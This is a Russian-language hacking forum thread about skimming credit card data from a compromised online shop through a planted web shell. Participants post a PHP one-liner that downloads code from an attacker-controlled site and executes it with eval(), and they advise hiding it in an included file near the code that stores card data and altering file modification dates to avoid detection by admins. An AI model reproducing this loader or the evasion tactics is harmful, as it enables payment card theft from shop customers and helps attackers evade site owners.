Перехватываем данные о СС с помошью шелла.

Это сообщение недоступно для Вас.

спалят за 1-2 дня

Лучше вместо таких неинформациооных высказываний дай развернутый ответ.Почему спалят?Как исправить это?Как улучшить?Как сделать хитрее?
Давайте жить дружно и создадим хороший мануал.

я думаю что спалят из-за того что много кода, но это можно обойти - тойсть сократить наш код до 2 строчок

PHP код:
$code = file_get_contents("http://nash.site.com/code.txt");
eval($code);

miki, ты в теме вообще? шелл уже на сайте есть.

sweet_hack, спалят
1 - дата изменения файла
2 - как правило, удается похекать шоп только благодаря уязвимости в самописном движке. самописные движки постоянно усовершенствуются и дописываются создателями. увидев "лишний" код нормальный программист его просто сотрёт, а хороший программист посмотрит по логам апача, где шелл и и его удалит

mrgrek, есть разница когда ты через шел вставишь тонну кода или пару строчек? Мне кажется что есть и очень большая!

Дату изминения файла редко,но иногда можно изменить.К тому же сомневаюсь что админ ежедневно пересматривает код во всем двиге.Ему и работы из админки+загребания бабла хватает.

Спасибо тс, познавательно

Советую размещать код в каком-нибудь "безпалевном файле", который include()'ится в *.php отвечающий за отправку $_POST в БД с СС. Меняйте дату редактирования файлов.

P.S.

Ещё короче images/smilies/smile.gif


PHP код:

eval(file_get_contents("http://nash.site.com/code.txt")); ​